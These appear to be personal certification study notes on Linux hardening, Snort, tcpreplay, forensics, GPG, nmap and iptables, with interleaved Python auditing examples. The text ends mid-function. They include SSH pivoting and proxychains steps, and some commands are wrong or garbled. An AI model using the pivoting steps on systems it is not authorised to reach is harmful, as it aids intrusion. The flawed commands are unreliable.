This may work without the username and password options if your computer is part of the domain.


Fedora Linux Hardening Steps:

1. Check what starts at runlevel 3; we want to turn off excess services.

a. chkconfig --list | grep '3:on'

b. Turn off services with: chkconfig serviceName off

2. (prolly not on GSE) but to check packages do: yum list

a. To remove: yum -y remove package-name

3. run: netstat -tulpn to see which ports are open and associated programs. Here is Fedora Sample Services

[root@localhost ~]# netstat -tulpn Active Internet connections (only servers) (IN LAB I NMAP AND NO OPENED PORTS)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 483/rpcbind

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 758/sshd

tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 1164/cupsd

tcp 0 0 0.0.0.0:41116 0.0.0.0:* LISTEN 806/rpc.statd

tcp6 0 0 :::111 :::* LISTEN 483/rpcbind

tcp6 0 0 :::22 :::* LISTEN 758/sshd

tcp6 0 0 ::1:631 :::* LISTEN 1164/cupsd

tcp6 0 0 :::56797 :::* LISTEN 806/rpc.statd

udp 0 0 0.0.0.0:5353 0.0.0.0:* 444/avahi-daemon: r

udp 0 0 0.0.0.0:43287 0.0.0.0:* 806/rpc.statd

udp 0 0 127.0.0.1:323 0.0.0.0:* 475/chronyd

udp 0 0 0.0.0.0:622 0.0.0.0:* 483/rpcbind

udp 0 0 0.0.0.0:50086 0.0.0.0:* 444/avahi-daemon: r

udp 0 0 127.0.0.1:982 0.0.0.0:* 806/rpc.statd

udp 0 0 0.0.0.0:68 0.0.0.0:* 1345/dhclient

udp 0 0 0.0.0.0:10331 0.0.0.0:* 1345/dhclient

udp 0 0 0.0.0.0:111 0.0.0.0:* 483/rpcbind

udp 0 0 0.0.0.0:123 0.0.0.0:* 475/chronyd

udp6 0 0 ::1:323 :::* 475/chronyd

udp6 0 0 :::19785 :::* 1345/dhclient

udp6 0 0 :::53756 :::* 806/rpc.statd

udp6 0 0 :::622 :::* 483/rpcbind

udp6 0 0 :::111 :::* 483/rpcbind

udp6 0 0 :::123 :::* 475/chronyd

4. /etc/sudoers file can be edited using visudo

You can add a user to the sudoers group to give full priv or:

a. jadmin ALL=/sbin/halt, /bin/kill, /etc/init.d/httpd ( this will allow certain commands)

5. SSH - /etc/ssh/sshd_config

a. PermitRootLogin no

b. AllowUsers username username username username (allow/deny can be user interchangeably)

c. DenyGroups group1 group2 (allow/deny can be used interchangeably)

d. Using protocol v2: Protocol 2

e. ClientAliveInterval 300 (this is seconds, sets the idle log timeout interval) f.ClientAliveCountMax 0 g. IgnoreRhosts yes (disables .rhosts file) h. PermitEmptyPasswords no
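A quick way to verify that a host actually carries the sshd_config settings from step 5 is to parse the file and compare each directive with the recommended value. The following auditor is an added example, not code from the notes or from OpenSSH: it reads the directive/value lines (first occurrence wins, as sshd itself does, and settings inside a Match block are skipped because they apply only conditionally) and lists every recommended directive that is missing or weaker than required. The sample config text is constructed; the assumption that any ClientAliveInterval of 300 seconds or less is acceptable is mine.

```python
"""Audit an sshd_config against the hardening directives in step 5 above.

Added example (not from the notes or OpenSSH). The config text below is
constructed; the threshold for ClientAliveInterval is an assumption.
"""
import re

# Recommended values from the notes; each predicate decides whether the
# configured value is acceptable.
RECOMMENDED = {
    "PermitRootLogin": lambda v: v == "no",
    "Protocol": lambda v: v == "2",
    "ClientAliveInterval": lambda v: v.isdigit() and 0 < int(v) <= 300,  # assumption: <= 300 s is fine
    "ClientAliveCountMax": lambda v: v == "0",
    "IgnoreRhosts": lambda v: v == "yes",
    "PermitEmptyPasswords": lambda v: v == "no",
}


def parse_sshd_config(text):
    """Return {directive: value} for the global section of an sshd_config.

    Keys are case-insensitive in sshd; they are normalised to the spelling
    used in RECOMMENDED. sshd uses the first occurrence of a directive, so
    later duplicates are ignored. Everything from the first 'Match' line on
    is conditional and therefore skipped.
    """
    canonical = {k.lower(): k for k in RECOMMENDED}
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # 'Key value' or 'Key=value'
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break                                   # global settings must precede Match
        settings.setdefault(canonical.get(key, parts[0]), value)
    return settings


def audit_sshd_config(text):
    """Return sorted (directive, configured_value_or_None) pairs that fail."""
    settings = parse_sshd_config(text)
    findings = []
    for directive, acceptable in RECOMMENDED.items():
        value = settings.get(directive)
        if value is None or not acceptable(value):
            findings.append((directive, value))
    return sorted(findings)


# Constructed sample, not a real host's config.
SAMPLE_CONFIG = """\
Port 22
Protocol 2
PermitRootLogin yes        # weak: should be no
ClientAliveInterval 300
ClientAliveCountMax 3
IgnoreRhosts yes
AllowUsers alice bob
Match User backup
    PermitEmptyPasswords yes
"""

if __name__ == "__main__":
    for directive, value in audit_sshd_config(SAM_CONFIG if False else SAMPLE_CONFIG):
        print("%-22s configured=%s" % (directive, value if value is not None else "<missing>"))
```

Point it at a real file with `audit_sshd_config(open("/etc/ssh/sshd_config").read())`; an empty list means every directive in the table is present with an acceptable value.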

6. Allow or disallow users to use cron with /etc/cron.allow or /etc/cron.deny

a. To disallow ALL users: echo ALL >> /etc/cron.deny

7. Enable or disable SELinux in /etc/selinux/config

a. You can view the current SELinux mode from the command line using the 'system-config-selinux', 'getenforce' or 'sestatus' commands.

b. #sestatus

c. #setenforce enforcing (enables)

8. Passwords: /etc/security/opasswd contains all old passwords.

a. nano /etc/pam.d/system-auth

b. Add the following line to stop users from reusing their last 5 passwords:

password sufficient pam_unix.so nullok use_authtok md5 shadow remember=5

c. To view an existing user's aging info, such as expiry date and time: chage -l username

d. To change it: chage -M 60 username

chage -M 60 -m 7 -W 7 username (-M sets max days, -m sets min days, -W sets days to warn before expiry)

e. To lock or unlock an account: passwd -l accountName or passwd -u accountName

f. Enforcing strong passwords in /etc/pam.d/system-auth:

/lib/security/$ISA/pam_cracklib.so retry=3 minlen=8 lcredit=-1 ucredit=-2 dcredit=-2 ocredit=-1

lcredit = lowercase letters, ucredit = uppercase letters, dcredit = digits, ocredit = other characters; a negative value is the minimum number of that class required (so -2 means at least two)

g. Checking accounts for empty passwords: awk -F: '($2 == "") {print $1}' /etc/passwd

If the password is in /etc/shadow there will be an 'x' in that field; if it is empty there will be nothing in that field.

h. /etc/shadow format: {userName}:{password}:{lastpasswdchanged}:{Minimum_days}:{Maximum_days}:{Warn}:{Inactive}:{Expire}:

9. Important Logs

/var/log/messages – whole-system / current activity logs.
/var/log/auth.log – authentication logs.
/var/log/kern.log – kernel logs.
/var/log/cron.log – crond logs (cron jobs).
/var/log/maillog – mail server logs.
/var/log/boot.log – system boot log.
/var/log/mysqld.log – MySQL database server log file.
/var/log/secure – authentication log.
/var/log/utmp or /var/log/wtmp – login records.
/var/log/yum.log – yum log file.

10. Keep /boot mounted read-only, not read/execute. Edit /etc/fstab (nano /etc/fstab):

a. The line should be: LABEL=/boot /boot ext4 defaults,ro 1 2

11. It's important to keep the system updated using yum update

12. Make sure no non-root account has UID 0: awk -F: '($3 == "0") {print}' /etc/passwd

You should only see: root:x:0:0:root:/root:/bin/bash

13. Disable unwanted SUID and SGID binaries: find / -perm -4000 and find / -perm -2000

SUID or SGID (either bit set): sudo find / -xdev -type f -perm /6000

14. World-writable files and directories: find /dir -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print

sudo find / -path /proc -prune -o -perm /o=w ! \( -type d -perm -o=t \) ! -type l -print

15. Files with no owner: find /dir -xdev \( -nouser -o -nogroup \) -print
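Items 12 to 15 are the same checks a filesystem audit script performs, and seeing them as explicit stat-bit tests makes the find expressions easier to read. The block below is an added example, not from the notes or from findutils: it walks a tree with os.walk/os.lstat and reports SUID/SGID regular files, world-writable paths (a directory is only reported when it lacks the sticky bit, matching the find expression in item 14), and paths whose uid or gid has no name on the system, plus the UID-0 check from item 12 run over passwd text. The sample tree and passwd text are constructed; the tree is built in a temporary directory so the block runs anywhere.

```python
"""Audit a directory tree for the conditions the find one-liners above look for.

Added example (not from the notes). build_sample_tree() creates a throw-away
tree with the interesting modes; SAMPLE_PASSWD is constructed text.
"""
import grp
import os
import pwd
import shutil
import stat
import tempfile


def root_uid_accounts(passwd_text):
    """Item 12: usernames whose UID field is 0 (should be root only)."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0":
            names.append(fields[0])
    return names


def audit_tree(root):
    """Return {'suid_sgid': [...], 'world_writable': [...], 'no_owner': [...]}
    as sorted paths relative to root. Symlinks are skipped (! -type l)."""
    findings = {"suid_sgid": [], "world_writable": [], "no_owner": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)                       # do not follow symlinks
            mode, rel = st.st_mode, os.path.relpath(path, root)
            if stat.S_ISLNK(mode):
                continue
            if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID):
                findings["suid_sgid"].append(rel)     # item 13: -perm /6000
            sticky_dir = stat.S_ISDIR(mode) and mode & stat.S_ISVTX
            if mode & stat.S_IWOTH and not sticky_dir:
                findings["world_writable"].append(rel)  # item 14: o=w but not a sticky dir
            try:
                pwd.getpwuid(st.st_uid)
                grp.getgrgid(st.st_gid)
            except KeyError:
                findings["no_owner"].append(rel)      # item 15: -nouser / -nogroup
    return {key: sorted(paths) for key, paths in findings.items()}


def build_sample_tree():
    """Constructed throw-away tree; returns its root. Remove with remove_tree()."""
    root = tempfile.mkdtemp(prefix="perm-audit-")
    for d in ("bin", "tmp", "shared"):
        os.mkdir(os.path.join(root, d))
    for rel, mode in (("bin/su-clone", 0o4755),      # setuid
                      ("bin/sgid-tool", 0o2755),     # setgid
                      ("bin/normal", 0o755),
                      ("shared/notes.txt", 0o666)):  # world-writable file
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("x\n")
        os.chmod(path, mode)
    os.chmod(os.path.join(root, "tmp"), 0o1777)     # sticky world-writable dir: not flagged
    os.chmod(os.path.join(root, "shared"), 0o777)   # world-writable, no sticky bit: flagged
    return root


def remove_tree(root):
    shutil.rmtree(root)


# Constructed: a second UID-0 account that item 12 should surface.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
jadmin:x:1000:1000::/home/jadmin:/bin/bash
toor:x:0:0:second uid 0 account:/root:/bin/bash
"""

if __name__ == "__main__":
    tree = build_sample_tree()
    try:
        for key, paths in audit_tree(tree).items():
            print(key, paths)
    finally:
        remove_tree(tree)
    print("uid 0 accounts:", root_uid_accounts(SAMPLE_PASSWD))
```

On a real host run `audit_tree("/")` as root with `-xdev`-style pruning added for /proc and network mounts; the no_owner list is only meaningful when the system's passwd and group databases are the ones the files were created against.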

15.5 find / -perm /6000 -type f -exec ls -ld {} \;

16. Configure a Linux or Unix host to log messages to a centralized loghost

Open the syslog configuration file /etc/syslog.conf:

# vi /etc/syslog.conf

Set up syslogd to send all messages to the loghost at IP 192.168.1.100 (or use the FQDN if configured); the auth,authpriv.none part of the selector below keeps the auth and authpriv facilities from being forwarded:

*.*;auth,authpriv.none @192.168.1.100

OR

*.*;auth,authpriv.none @loghost.mydomain.com.

Restart sysklogd (Debian Linux):

# /etc/init.d/sysklogd restart

OR restart syslogd under Red Hat / Fedora / CentOS Linux:

# service syslog restart

If required, open outgoing UDP port 514 to the loghost (and the return traffic) with iptables:

iptables -A OUTPUT -p udp -s 192.168.1.100 --sport 1024:65535 -d 192.168.1.5 --dport 514 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A INPUT -p udp -s 192.168.1.5 --sport 514 -d 192.168.1.100 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT

sudo iptables-save > /etc/iptables_rules

It doesn't really matter where you put the file; all you have to do is make sure that the next line refers to the same file. Next, open /etc/rc.local and add this line: /sbin/iptables-restore < /etc/iptables_rules
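The selector line in item 16 decides which messages actually leave the host, so it is worth being able to predict that before pointing a fleet at a loghost. The following is an added example, not from the notes or from sysklogd: it evaluates classic syslog.conf selectors the way sysklogd does (a facility.priority field matches that priority and everything more severe, later fields override earlier ones for the same facility, and "none" removes a facility), and builds the RFC 3164 PRI value, facility times 8 plus severity, that would be sent on the wire. The message list is constructed.

```python
"""Which messages does a syslog.conf selector forward?

Added example (not from the notes or sysklogd). SAMPLE_MESSAGES is constructed.
"""
# severities in RFC 3164 order: index 0 is most severe
PRIORITIES = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]
FACILITY_CODES = {"kern": 0, "user": 1, "mail": 2, "daemon": 3, "auth": 4, "syslog": 5,
                  "lpr": 6, "news": 7, "uucp": 8, "cron": 9, "authpriv": 10, "ftp": 11}
FACILITY_CODES.update({"local%d" % i: 16 + i for i in range(8)})


def compile_selector(selector):
    """Return {facility: least-severe priority index still forwarded}.

    Fields are separated by ';'. 'facility.priority' means that priority and
    anything more severe; '*' is any facility / any priority; '.none' removes
    the facility entirely. Later fields override earlier ones.
    """
    table = {}
    for field in selector.split(";"):
        facilities, _, priority = field.strip().rpartition(".")
        names = list(FACILITY_CODES) if facilities == "*" else facilities.split(",")
        for name in names:
            if priority == "none":
                table.pop(name, None)
            elif priority == "*":
                table[name] = len(PRIORITIES) - 1     # debug and above: everything
            else:
                table[name] = PRIORITIES.index(priority)
    return table


def is_forwarded(table, facility, priority):
    limit = table.get(facility)
    return limit is not None and PRIORITIES.index(priority) <= limit


def pri_value(facility, priority):
    """RFC 3164 PRI = facility code * 8 + severity."""
    return FACILITY_CODES[facility] * 8 + PRIORITIES.index(priority)


def forwarded_lines(selector, messages):
    """messages: (facility, priority, text). Return the '<PRI>text' lines sent."""
    table = compile_selector(selector)
    return ["<%d>%s" % (pri_value(f, p), text)
            for f, p, text in messages if is_forwarded(table, f, p)]


# Constructed sample messages (facility, priority, text).
SAMPLE_MESSAGES = [
    ("kern", "warning", "kernel: possible SYN flooding on port 80"),
    ("auth", "info", "sshd[758]: Accepted publickey for jadmin"),
    ("authpriv", "notice", "sudo: jadmin : TTY=pts/0 ; COMMAND=/bin/kill"),
    ("cron", "info", "CROND[1200]: (root) CMD (run-parts /etc/cron.hourly)"),
    ("mail", "debug", "sendmail[1300]: queue run"),
]

if __name__ == "__main__":
    for line in forwarded_lines("*.*;auth,authpriv.none", SAMPLE_MESSAGES):
        print(line)
```

With the selector from the notes the kern, cron and mail messages are forwarded and the two authentication messages stay local; a second line such as `auth,authpriv.* @loghost` would be needed to ship those as well.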

17. The default logrotate configuration file is /etc/logrotate.conf

18. Connection banners. Located at /etc/motd for ssh; all others in /etc/banners. Must first be configured in /etc/hosts.allow by adding the following line: vsftpd : ALL : banners /etc/banners. Access can also be restricted per service, for example: portmap : 1.2.3.4 : deny

19. ALL : 206.182.68.0 : spawn /bin/echo `date` %c %d >> /var/log/intruder_alert

The %d token supplies the name of the service that the attacker was trying to access.

To allow the connection and log it, place the spawn directive above in the /etc/hosts.allow file.

20. NIS

a. An NIS server is comprised of several applications. They include the following:

• /usr/sbin/rpc.yppasswdd — Also called the yppasswdd service, this daemon allows users to change their NIS passwords.
• /usr/sbin/rpc.ypxfrd — Also called the ypxfrd service, this daemon is responsible for NIS map transfers over the network.
• /usr/sbin/yppush — This application propagates changed NIS databases to multiple NIS servers.
• /usr/sbin/ypserv — This is the NIS server daemon.

21. NIS – typically ports 834, 835

If the /var/yp/securenets file is blank or does not exist (as is the case after a default installation), NIS listens to all networks. One of the first things to do is to put netmask/network pairs in the file so that ypserv only responds to requests from the appropriate network.

Below is a sample entry from a /var/yp/securenets file:

255.255.255.0 192.168.0.0

22. NFS Firewall Configuration

The ports used for NFS are assigned dynamically by rpcbind, which can cause problems when creating firewall rules. To simplify this process, use the /etc/sysconfig/nfs file to specify which ports are to be used:

• MOUNTD_PORT — TCP and UDP port for mountd (rpc.mountd)
• STATD_PORT — TCP and UDP port for status (rpc.statd)
• LOCKD_TCPPORT — TCP port for nlockmgr (rpc.lockd)
• LOCKD_UDPPORT — UDP port for nlockmgr (rpc.lockd)

Port numbers specified must not be used by any other service. Configure your firewall to allow the port numbers specified, as well as TCP and UDP port 2049 (NFS). Run the rpcinfo -p command on the NFS server to see which ports and RPC programs are being used.

23. Securing Apache HTTP Server

Always verify that any scripts running on the system work as intended before putting them into production. Also, ensure that only the root user has write permissions to any directory containing scripts or CGIs. To do this, run the following commands as the root user:

1. chown root <directory_name>

2. chmod 755 <directory_name>

System administrators should be careful when using the following configuration options (configured in /etc/httpd/conf/httpd.conf):

24. Securing FTP

a. To change the greeting banner for vsftpd, add the following directive to the /etc/vsftpd/vsftpd.conf file:

ftpd_banner=<insert_greeting_here>

b. /var/ftp/ – if this directory exists then anonymous access exists

c. anon_upload_enable=NO (in /etc/vsftpd/vsftpd.conf)

d. local_enable=NO (this disables local accounts from using FTP)

e. To disable specific user accounts in vsftpd, add the username to /etc/vsftpd.ftpusers

25. Limiting a DoS attacker

By setting limits on the following directives in /etc/mail/sendmail.mc, the effectiveness of such attacks is limited.

confCONNECTION_RATE_THROTTLE — The number of connections the server can receive per second. By default, Sendmail does not limit the number of connections. If a limit is set and reached, further connections are delayed.

confMAX_DAEMON_CHILDREN — The maximum number of child processes that can be spawned by the server. By default, Sendmail does not assign a limit to the number of child processes. If a limit is set and reached, further connections are delayed.

confMIN_FREE_BLOCKS — The minimum number of free blocks which must be available for the server to accept mail. The default is 100 blocks.

confMAX_HEADERS_LENGTH — The maximum acceptable size (in bytes) for a message header.

confMAX_MESSAGE_SIZE — The maximum acceptable size (in bytes) for a single message.

26. Service-only accounts / restricting console access

Shell accounts on the server should not be allowed, and all user shells in the /etc/passwd file should be set to /sbin/nologin (with the possible exception of the root user).

27. TIME

• From the desktop, go to Applications (the main menu on the panel) > System Settings > Date & Time
• From the desktop, right-click on the time in the toolbar and select Adjust Date and Time.

28. NTP

The Network Time Protocol (NTP) daemon synchronizes the system clock with a remote time server or time source. The application allows you to configure an NTP daemon to synchronize your system clock with a remote server. To enable this feature, select Enable Network Time Protocol. This enables the NTP Servers list and other options. You can choose one of the predefined servers, edit a predefined server by clicking Edit, or add a new server name by clicking Add. Your system does not start synchronizing with the NTP server until you click OK. After clicking OK, the configuration is saved and the NTP daemon is started (or restarted if it is already running).

Clicking the OK button applies any changes made to the date and time, the NTP daemon settings, and the time zone settings. It also exits the program.

29.

Snort Notes

1. Modify snort.conf.

2. Change variables (see step 3 for examples).

3. Change site-specific rules. Should have:

include $RULE_PATH/local.rules
include $RULE_PATH/downloaded.rules

# Setup the network addresses you are protecting (EXAMPLES of variables)
ipvar HOME_NET [192.168.0.0/16]

# Set up the external network addresses. Leave as "any" in most situations
ipvar EXTERNAL_NET [!$HOME_NET]

4. To test against a pcap: sudo snort -r ~/Desktop/test.pcap -c /etc/snort/snort.conf -l ~/Desktop

-r reads the pcap, -c selects the conf file, -l sets the local log directory

You should then have an 'alert' file and a snort.log.{randomNum} pcap file in the chosen dump directory.

a. alert udp any any -> 192.168.10.2 7983 (msg:"Consecutive Pi"; pcre:"/pi/is"; threshold:type limit, track by_src, count 2, seconds 60; sid:333; rev:1;)
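The threshold option in rule 4a is what keeps a chatty source from producing an alert per packet, and the three threshold types behave quite differently. The block below is an added example, not Snort's code or the notes': it parses the same `threshold:` option string used in the rule and models the documented behaviour of `limit` (alert on the first N events per source per window, then stay quiet until the window ends), `threshold` (alert every Nth event) and `both` (alert once per window once N events have arrived). The timeline of matching packets is constructed; the assumption that a window starts at the first event seen for a key is mine.

```python
"""Snort event thresholding for the 'threshold:' option in the rule above.

Added example (not from Snort or the notes). TIMELINE is a constructed
sequence of packets that already matched the rule's other conditions.
"""


def parse_threshold(option):
    """'type limit, track by_src, count 2 , seconds 60' -> dict."""
    params = {}
    for item in option.split(","):
        key, value = item.split()
        params[key] = int(value) if value.isdigit() else value
    return params


class Threshold:
    def __init__(self, kind, track, count, seconds):
        self.kind, self.track, self.count, self.seconds = kind, track, count, seconds
        self.windows = {}   # key -> (window_start, events_in_window, alerted_this_window)

    def check(self, packet):
        """Return True if this matching packet should raise an alert."""
        key = packet["src"] if self.track == "by_src" else packet["dst"]
        ts = packet["ts"]
        start, n, alerted = self.windows.get(key, (None, 0, False))
        if start is None or ts - start >= self.seconds:
            start, n, alerted = ts, 0, False      # assumption: window starts at first event
        n += 1
        fire = False
        if self.kind == "limit":                  # first `count` events per window
            fire = n <= self.count
        elif self.kind == "threshold":            # every `count`-th event
            if n == self.count:
                fire, n = True, 0
        elif self.kind == "both":                 # once per window, after `count` events
            if n >= self.count and not alerted:
                fire = alerted = True
        self.windows[key] = (start, n, alerted)
        return fire


def alerts_for(option, packets):
    """Return the timestamps of the packets that produce an alert."""
    p = parse_threshold(option)
    th = Threshold(p["type"], p["track"], p["count"], p["seconds"])
    return [pkt["ts"] for pkt in packets if th.check(pkt)]


RULE_THRESHOLD = "type limit, track by_src, count 2 , seconds 60"

# Constructed: UDP packets to 192.168.10.2:7983 whose payload matched /pi/.
TIMELINE = [
    {"ts": 0, "src": "192.168.10.50", "dst": "192.168.10.2"},
    {"ts": 10, "src": "192.168.10.50", "dst": "192.168.10.2"},
    {"ts": 20, "src": "192.168.10.50", "dst": "192.168.10.2"},
    {"ts": 25, "src": "192.168.10.77", "dst": "192.168.10.2"},
    {"ts": 30, "src": "192.168.10.50", "dst": "192.168.10.2"},
    {"ts": 61, "src": "192.168.10.50", "dst": "192.168.10.2"},
    {"ts": 70, "src": "192.168.10.50", "dst": "192.168.10.2"},
    {"ts": 80, "src": "192.168.10.50", "dst": "192.168.10.2"},
]

if __name__ == "__main__":
    for kind in ("limit", "threshold", "both"):
        opt = RULE_THRESHOLD.replace("limit", kind)
        print(kind, "alerts at", alerts_for(opt, TIMELINE))
```

With the rule's own settings, .50 gets two alerts at 0 and 10, is silent for the rest of the minute, and alerts again at 61 and 70 when a new window opens; .77 gets its own counter because tracking is by_src.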

TcpReplay / tcprewrite / tcpprep

Step 1: Use tcpprep to split traffic based on the source/destination port:

$ tcpprep --port --cachefile=example.cache --pcap=example.pcap

In this case, all the packets directed to a TCP or UDP port < 1024 are considered client->server, while other packets are server->client. This information is stored in a tcpprep cache file called example.cache for later use. Note: tcpprep supports many other methods of splitting traffic than just port mode.

Step 2: Use tcprewrite to change the IP addresses to the local network:

$ tcprewrite --endpoints=172.16.0.1:172.16.5.35 --cachefile=example.cache --infile=example.pcap --outfile=new.pcap

Here, we want all traffic to appear to be between two hosts: 172.16.0.1 and 172.16.5.35. We want one IP to be the "client" and the other IP the "server", so we use the cache file created in the last step.

Step 3: Use tcpreplay to send the traffic through the IPS:

# tcpreplay --intf1=eth0 --intf2=eth1 --cachefile=example.cache new.pcap

Mounting with DD

0.1 Make working and original copies first.

1. To create an image: # dd if=/dev/sda of=/mnt/nfs/backup/harddrive.img

2. To check the file system: # file harddrive.dd

3. To mount: # mount -o ro ./harddriveimage.dd /mnt

4. To unmount: # umount /mnt

5. To restore: # dd if=/mnt/mybackup.ddimg of=/dev/sda

Changing names on multiple files

1. counter=0

2. for i in ./webstats.php*; do mv $i ./webstats$counter.html; counter=$((counter+1)); done

3. python3 -m http.server 80

SCP

scp /path/to/file [email protected]:/path/to/dest

scp [email protected]:/path/to/file /path/to/dest

SSH PIVOTING

ssh -L 127.0.0.1:445:10.10.9.159:445 [email protected]

----local ip/port---- ----target ip/port---- ----pivot user and destination IP----

ssh socks proxy / proxychains:

SOCKS Proxy

Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):

Command line:

First configure proxychains at /etc/proxychains.conf. By default it's port 9050.

# ssh -D 127.0.0.1:9050 [email protected]

(target ip)

# proxychains nmap -n 9050 10.0.0.1

FIREFOX CONFIG FOR SSH/SOCKS PROXY:

GPG4Win

1. Encrypt a file for a recipient using their public key:

D:\gpg --encrypt -r Bob myFile.txt

--armor (ASCII armor switch)

--output (sets the output filename)

--symmetric (set a passphrase to encrypt and decrypt)

2. Decryption:

gpg --decrypt my-file.gpg

can also use --output

3. Signing:

gpg --armor --sign my-file.txt

YOU CAN COMBINE THESE

4. Key creation:

gpg --gen-key

--edit-key bob (edits the current key)

5. Importing keys:

gpg --import d:\temp\pubKeybob.asc

gpg --import d:\temp\my-sec.gpg

6. Listing keys:

gpg -kv (public keys)

gpg --list-keys

7. Export public key:

gpg --armor --output pub.asc --export Chris

--export-secret-keys (exports private keys)

8. Sign keys so they are accepted:

gpg --sign-key [email protected]

9. Sending back a signed key:

gpg --export --armor [email protected]

10. Encrypt a message for sending:

gpg --encrypt --sign --armor -r [email protected] name_of_file

Volatility:

volatility -f flag4.raw psxview
volatility -f flag4.raw --pid=1288 cmdline
volatility -f flag4.raw memdump -p 1288 -D dir/

Open the dump in Notepad++/FRHED to see what the process did.

OpenVas

root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade
root@kali:~# apt-get install openvas
root@kali:~# openvas-setup
root@kali:~# netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:9390 0.0.0.0:* LISTEN 9583/openvasmd
tcp 0 0 127.0.0.1:9391 0.0.0.0:* LISTEN 9570/openvassd: Wai
tcp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN 9596/gsad
root@kali:~# openvas-start

https://127.0.0.1:9392

openvas-check-setup
openvas-stop
openvasmd --create-user=admin --role=Admin
openvasmd --user=admin --new-password=admin
openvas-start

NMAP

1. The following will scan just for port 22 and then make a list of the hosts that have it open:

nmap -n -p 22 -Pn --open 192.168.119.133 | grep report | cut -d " " -f5 > /tmp/ipaddr.list

2.

IPTABLES

Display status:

# iptables -L -n -v

With line numbers:

# iptables -n -L -v --line-numbers

Display the INPUT or OUTPUT chain on its own:

# iptables -L INPUT -n -v

# iptables -L OUTPUT -n -v --line-numbers

Start/Stop/Restart:

# service iptables start
# service iptables stop
# service iptables restart

Flush / delete all rules:

# iptables -F

Delete a specific rule by its line number:

# iptables -D INPUT 4

Insert a rule at a specific position:

# iptables -I INPUT 2 -s 202.54.1.2 -j DROP (drops any packets coming in from 202.54.1.2)

To save firewall rules under CentOS / RHEL / Fedora Linux, enter:

# service iptables save

To restore firewall rules from a file called /root/my.active.firewall.rules, enter:

# iptables-restore < /root/my.active.firewall.rules

To restore firewall rules under CentOS / RHEL / Fedora Linux, enter:

# service iptables restart

To set default policies:

# iptables -P INPUT DROP
# iptables -P OUTPUT DROP
# iptables -P FORWARD DROP

Base default install:

# iptables -N LOGGING    (creates a new chain; LOG targets write to /var/log/messages or /var/log/kern.log)
# iptables -P INPUT DROP
# iptables -P FORWARD DROP
# iptables -P OUTPUT ACCEPT
# iptables -A INPUT -m state --state NEW,ESTABLISHED -j ACCEPT
# iptables -A INPUT -p udp -s 192.168.1.5 --sport 514 -d 192.168.1.100 --dport 1024:65535 -j LOG --log-level 4
# iptables -A INPUT -p udp -s 192.168.1.5 --sport 514 -d 192.168.1.100 --dport 1024:65535 -j DROP
# iptables -A INPUT -i lo -j ACCEPT
# iptables -A OUTPUT -o lo -j ACCEPT

THIS NEXT PORTION LOGS ALL DROPPED PACKETS THAT REACH THE END OF THE INPUT CHAIN:

# iptables -N LOGGING
# iptables -A INPUT -j LOGGING
# iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables-Dropped: " --log-level 4
# iptables -A LOGGING -j DROP

MORE MISC RULES

iptables -A OUTPUT -j ACCEPT

This tells iptables to add a rule accepting OUTPUT.

You should now have:

iptables -F
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --sport 80 -j ACCEPT
iptables -A INPUT -p udp --sport 53 -j ACCEPT
iptables -A INPUT -j DROP
iptables -A OUTPUT -j ACCEPT
iptables-save > /etc/iptables.rules
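Every iptables list above depends on rule order: a chain is walked top-down, the first terminating match wins, LOG does not terminate, and a user-defined chain such as LOGGING hands control back when it runs out of rules. The block below is an added example, not from the notes or from iptables: it is a small model of those semantics driven by the same command lines that appear in the notes, so the effect of an ordering change can be checked before touching a live firewall. Packets are constructed dicts; only the option subset used in the notes is parsed.

```python
"""First-match evaluation of the iptables rule lists above.

Added example (not from the notes or iptables). SAMPLE_PACKETS are constructed;
the rulesets are the ones from the notes, with the notes' '# ' prompt tolerated.
"""
import ipaddress
import shlex

# options taking one argument; they become the rule's match criteria or target
_OPTS = ("-p", "-s", "-d", "-i", "-o", "--sport", "--dport", "--state",
         "-j", "--log-prefix", "--log-level", "--limit")


class Firewall:
    def __init__(self):
        self.chains = {"INPUT": [], "OUTPUT": [], "FORWARD": []}
        self.policy = {"INPUT": "ACCEPT", "OUTPUT": "ACCEPT", "FORWARD": "ACCEPT"}
        self.log = []                           # what the LOG target would have written

    def run(self, cmdline):
        """Apply one 'iptables ...' line (the option subset used in the notes)."""
        argv = shlex.split(cmdline)
        while argv and argv[0] in ("#", "iptables"):
            argv.pop(0)
        rule, chain, action, pos, i = {}, None, None, 1, 0
        while i < len(argv):
            tok = argv[i]
            if tok == "-P":
                self.policy[argv[i + 1]] = argv[i + 2]; i += 3
            elif tok == "-N":
                self.chains[argv[i + 1]] = []; i += 2
            elif tok in ("-A", "-I"):
                action, chain, i = tok, argv[i + 1], i + 2
                if tok == "-I" and i < len(argv) and argv[i].isdigit():
                    pos, i = int(argv[i]), i + 1  # '-I INPUT 2 ...' inserts at line 2
            elif tok == "-m":
                i += 2                          # extension name; its options are in _OPTS
            elif tok in _OPTS:
                rule[tok] = argv[i + 1]; i += 2
            else:
                raise ValueError("unsupported option: " + tok)
        if action == "-A":
            self.chains[chain].append(rule)
        elif action == "-I":
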